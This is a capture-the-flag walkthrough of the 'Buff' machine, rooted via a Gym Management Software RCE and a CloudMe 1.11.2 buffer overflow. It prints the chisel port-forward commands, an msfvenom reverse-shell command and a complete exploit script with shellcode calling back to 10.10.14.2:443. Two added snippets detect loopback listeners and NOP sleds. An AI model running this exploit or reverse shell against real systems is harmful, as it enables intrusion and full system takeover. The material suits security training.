Buff

Gaining Access

Nmap Scan:

Gym

On port 8080, it was a gym-related page:

We can use gobuster on the website to find more directories:

Checking the contact.php file, we see the software used to build the site: Gym Management Software 1.0.

Then, we can search for exploits for this Gym Management Software 1.0.

We can try the RCE exploit:

By running the exploit, we would gain a webshell:

Afterwards, we can transfer nc.exe onto the machine from an SMB share served with smbserver.py.

Privilege Escalation

CloudMe

When enumerating the user's directory, we find a CloudMe_1112.exe file:

C:\Users\shaun\Downloads>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\Users\shaun\Downloads

14/07/2020  13:27    <DIR>          .
14/07/2020  13:27    <DIR>          ..
16/06/2020  16:26        17,830,824 CloudMe_1112.exe
               1 File(s)     17,830,824 bytes
               2 Dir(s)   7,564,353,536 bytes free

When checking for exploits regarding CloudMe, we can find a few Buffer Overflow exploits that can be used for RCE using shellcode.

CloudMe listens on port 8888 on this machine, so we can run it and use chisel to forward port 8888 back to our Kali host.

# on Kali
chisel server --port 4444 --reverse

# on host
.\chisel.exe client 10.10.14.2:4444 R:8888:localhost:8888
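The forward above is needed because the CloudMe listener is reachable only from the host itself. As an added example (not part of the original writeup), the following script parses Windows `netstat -ano` output and lists TCP sockets bound to a loopback address; from the defender's side this is the inventory of local-only services that a reverse forward like the one above would expose once an intruder has a foothold. The netstat lines, the PIDs and the 192.0.2.10 address are constructed for the example; only port 8888 for CloudMe comes from the writeup.

```python
# Added example, not from the original writeup: find TCP listeners bound to loopback
# in "netstat -ano" output. The sample text below is constructed; PIDs and the
# 192.0.2.10 host address are made up, port 8888 is CloudMe's port from the writeup.

NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       900
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       3072
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       4116
  TCP    192.0.2.10:8080        10.10.14.2:51432       ESTABLISHED     3072
  TCP    [::1]:8888             [::]:0                 LISTENING       4116
  UDP    0.0.0.0:5353           *:*                                    1288
"""


def split_endpoint(endpoint):
    """Split 'host:port' (IPv4 or bracketed IPv6) into (host, port)."""
    host, _, port = endpoint.rpartition(":")
    return host, int(port)


def is_loopback(host):
    """True for IPv4 127.0.0.0/8 and the IPv6 loopback [::1]."""
    return host.startswith("127.") or host == "[::1]"


def loopback_listeners(netstat_text):
    """Return (port, host, pid) for every TCP socket in LISTENING state bound to a loopback address."""
    found = []
    for line in netstat_text.splitlines():
        parts = line.split()
        # TCP rows have exactly five columns; UDP rows have no State column and are skipped
        if len(parts) != 5 or parts[0] != "TCP" or parts[3] != "LISTENING":
            continue
        host, port = split_endpoint(parts[1])
        if is_loopback(host):
            found.append((port, host, int(parts[4])))
    return found


if __name__ == "__main__":
    for port, host, pid in loopback_listeners(NETSTAT_SAMPLE):
        print(f"loopback-only listener: {host}:{port} (PID {pid})")
```

On a real host, pipe `netstat -ano` into the parser instead of the constructed sample; a service that shows up here but has public exploits (CloudMe 1.11.2 in this case) is worth removing or patching even though it is not reachable from the network directly.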

Then, we need to generate new shellcode for the exploit:

msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.2 LPORT=443 -b '\x00\x0A\x0D' -f python -v payload

The final script based on the PoC should look like this:

# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

#Instructions:
# Start the CloudMe service and run the script.

import socket

target = "127.0.0.1"

padding1   = b"\x90" * 1052
EIP        = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS       = b"\x90" * 30

#msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.2 LPORT=443 -b '\x00\x0A\x0D' -f python -v payload
payload = b""
payload += b"\xdb\xc0\xb8\x78\xb6\x92\xc4\xd9\x74\x24\xf4"
payload += b"\x5b\x29\xc9\xb1\x52\x31\x43\x17\x03\x43\x17"
payload += b"\x83\x93\x4a\x70\x31\x9f\x5b\xf7\xba\x5f\x9c"
payload += b"\x98\x33\xba\xad\x98\x20\xcf\x9e\x28\x22\x9d"
payload += b"\x12\xc2\x66\x35\xa0\xa6\xae\x3a\x01\x0c\x89"
payload += b"\x75\x92\x3d\xe9\x14\x10\x3c\x3e\xf6\x29\x8f"
payload += b"\x33\xf7\x6e\xf2\xbe\xa5\x27\x78\x6c\x59\x43"
payload += b"\x34\xad\xd2\x1f\xd8\xb5\x07\xd7\xdb\x94\x96"
payload += b"\x63\x82\x36\x19\xa7\xbe\x7e\x01\xa4\xfb\xc9"
payload += b"\xba\x1e\x77\xc8\x6a\x6f\x78\x67\x53\x5f\x8b"
payload += b"\x79\x94\x58\x74\x0c\xec\x9a\x09\x17\x2b\xe0"
payload += b"\xd5\x92\xaf\x42\x9d\x05\x0b\x72\x72\xd3\xd8"
payload += b"\x78\x3f\x97\x86\x9c\xbe\x74\xbd\x99\x4b\x7b"
payload += b"\x11\x28\x0f\x58\xb5\x70\xcb\xc1\xec\xdc\xba"
payload += b"\xfe\xee\xbe\x63\x5b\x65\x52\x77\xd6\x24\x3b"
payload += b"\xb4\xdb\xd6\xbb\xd2\x6c\xa5\x89\x7d\xc7\x21"
payload += b"\xa2\xf6\xc1\xb6\xc5\x2c\xb5\x28\x38\xcf\xc6"
payload += b"\x61\xff\x9b\x96\x19\xd6\xa3\x7c\xd9\xd7\x71"
payload += b"\xd2\x89\x77\x2a\x93\x79\x38\x9a\x7b\x93\xb7"
payload += b"\xc5\x9c\x9c\x1d\x6e\x36\x67\xf6\x9b\xcd\x69"
payload += b"\x04\xf4\xd3\x75\x09\xbf\x5d\x93\x63\xaf\x0b"
payload += b"\x0c\x1c\x56\x16\xc6\xbd\x97\x8c\xa3\xfe\x1c"
payload += b"\x23\x54\xb0\xd4\x4e\x46\x25\x15\x05\x34\xe0"
payload += b"\x2a\xb3\x50\x6e\xb8\x58\xa0\xf9\xa1\xf6\xf7"
payload += b"\xae\x14\x0f\x9d\x42\x0e\xb9\x83\x9e\xd6\x82"
payload += b"\x07\x45\x2b\x0c\x86\x08\x17\x2a\x98\xd4\x98"
payload += b"\x76\xcc\x88\xce\x20\xba\x6e\xb9\x82\x14\x39"
payload += b"\x16\x4d\xf0\xbc\x54\x4e\x86\xc0\xb0\x38\x66"
payload += b"\x70\x6d\x7d\x99\xbd\xf9\x89\xe2\xa3\x99\x76"
payload += b"\x39\x60\xa9\x3c\x63\xc1\x22\x99\xf6\x53\x2f"
payload += b"\x1a\x2d\x97\x56\x99\xc7\x68\xad\x81\xa2\x6d"
payload += b"\xe9\x05\x5f\x1c\x62\xe0\x5f\xb3\x83\x21"

overrun    = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))  # fill the rest of the 1500-byte buffer

buf = padding1 + EIP + NOPS + payload + overrun  # overwrite EIP with PUSH ESP; RET, then slide over the NOPs into the shellcode

try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target, 8888))
        s.send(buf)
        s.close()
except Exception as e:
        # the original PoC called print(sys.exc_value), which is Python 2 only and never imported sys
        print(e)

Afterwards, run it using python3 with a listener waiting on port 443, and an administrator shell will spawn.
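The buffer the PoC sends has a very recognisable shape: 1500 bytes, most of them 0x90, delivered to a service that normally sees short messages. As an added example (not from the writeup or the PoC author), the following detector checks a request captured on the way to port 8888 for that shape, an oversized request and a long NOP sled. The two sample requests and the thresholds are constructed for the example; 0xCC stands in for the shellcode and "A" bytes for the return address, while the 1052/30/1500 sizes are the ones from the PoC above.

```python
# Added example, not from the original writeup: heuristic check of a request
# for the overflow-buffer shape (oversized, long 0x90 run). Samples and
# thresholds are constructed here; the byte counts mirror the PoC layout.


def longest_byte_run(data, value):
    """Length of the longest run of consecutive bytes equal to value."""
    best = run = 0
    for b in data:
        run = run + 1 if b == value else 0
        best = max(best, run)
    return best


def inspect_request(data, max_len=1024, sled_len=32):
    """Return the reasons a request looks like the overflow buffer; an empty list means nothing was flagged."""
    reasons = []
    if len(data) > max_len:
        reasons.append(f"oversized request: {len(data)} bytes > {max_len}")
    sled = longest_byte_run(data, 0x90)
    if sled >= sled_len:
        reasons.append(f"NOP sled: {sled} consecutive 0x90 bytes")
    return reasons


# Constructed samples. The second mirrors the PoC layout: 1052 bytes of padding,
# a 4-byte return address (stand-in "AAAA"), 30 NOPs, shellcode (stand-in 0xCC),
# and filler up to 1500 bytes.
BENIGN_SAMPLE = b"hello cloudme\r\n"
OVERFLOW_SAMPLE = b"\x90" * 1052 + b"AAAA" + b"\x90" * 30 + b"\xcc" * 351
OVERFLOW_SAMPLE += b"C" * (1500 - len(OVERFLOW_SAMPLE))


if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_SAMPLE), ("overflow", OVERFLOW_SAMPLE)):
        print(name, inspect_request(sample) or "clean")
```

A NOP sled is only one tell; an encoded payload without one would pass the second check, so the length threshold should be set from the service's real traffic rather than left at the constructed default.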

Rooted!

References:
  • Exploit Database: Gym Management System 1.0 - Unauthenticated Remote Code Execution
  • Exploit Database: CloudMe 1.11.2 - Buffer Overflow (PoC)